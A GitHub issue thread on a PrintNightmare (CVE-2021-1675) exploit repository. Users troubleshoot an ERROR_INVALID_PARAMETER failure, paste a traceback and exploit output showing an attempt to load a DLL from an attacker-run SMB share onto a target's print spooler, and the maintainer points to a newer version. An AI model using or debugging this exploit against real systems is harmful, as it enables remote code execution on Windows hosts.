cube0x0/CVE-2021-1675

ERROR_INVALID_PARAMETER

Closed this issue · 3 comments

Hi,

I started SMB sharing as anonymous with SMBv2 support. Any user can access the SMB share and it works correctly in the DLL but I keep getting the following error. Do you have any advice?

[*] Try 1...
[*] Connecting to ncacn_np:192.168.237.131[\PIPE\spoolss]
[+] Bind OK
[*] Uploading \\192.168.237.130\share\a.dll
Traceback (most recent call last):
  File "/opt/CVE-2021-1675/CVE-2021-1675.py", line 117, in <module>
    main(username, password, domain, lmhash, nthash, options.target_ip, options.port, options.share)
  File "/opt/CVE-2021-1675/CVE-2021-1675.py", line 53, in main
    resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210629.125315.f43cf082-py3.9.egg/impacket/dcerpc/v5/rprn.py", line 614, in hRpcAddPrinterDriverEx
    return dce.request(request)
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210629.125315.f43cf082-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 878, in request
    raise exception
impacket.dcerpc.v5.rprn.DCERPCSessionError: RPRN SessionError: code: 0x57 - ERROR_INVALID_PARAMETER - The parameter is incorrect.```

I have the same issue

Hey

Please try the latest version 261b685

Sorry i ha ve this issue while preparing my demo for tommorrow. i used the version of CVE-2021-1675.py you just mentionned and it still doesn't work. This is a screenshoot of what i have. Coud you please share a solution for this problem.